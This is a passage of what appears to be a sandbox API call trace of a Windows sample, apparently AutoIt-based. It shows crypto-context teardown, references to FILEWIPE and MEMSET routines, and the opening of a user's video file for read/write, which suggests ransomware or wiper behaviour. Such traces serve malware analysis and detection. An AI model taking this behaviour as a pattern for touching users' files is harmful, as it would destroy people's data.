[0042.116] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.116] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.116] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.116] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.116] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.116] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.116] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.124] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.124] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.124] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.130] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.130] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.130] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.130] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.130] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0042.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.130] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0042.130] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.130] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.131] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.131] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.131] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.131] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.131] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.131] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0042.131] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0042.131] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.131] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.131] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.131] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0042.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.132] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.132] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.132] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.132] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.132] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0042.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.132] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.132] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.133] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.133] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.133] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0042.133] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0042.133] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.133] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.133] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.133] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.134] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.134] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0042.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b88250, ftCreationTime.dwHighDateTime=0x1d5b669, ftLastAccessTime.dwLowDateTime=0x39f1cbd0, ftLastAccessTime.dwHighDateTime=0x1d5b880, ftLastWriteTime.dwLowDateTime=0x39f1cbd0, ftLastWriteTime.dwHighDateTime=0x1d5b880, nFileSizeHigh=0x0, nFileSizeLow=0x1435f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0bc6y2qC_04DdnddgHl.mkv", cAlternateFileName="0BC6Y2~1.MKV")) returned 0x7c2240 [0042.135] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0042.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.135] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.135] CharLowerBuffW (in: lpsz="byte[82783]", cchLength=0xb | out: lpsz="byte[82783]") returned 0xb [0042.135] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.136] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.136] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.136] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.136] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.136] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.137] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0042.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.138] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.138] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\0bc6y2qc_04ddnddghl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0042.139] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 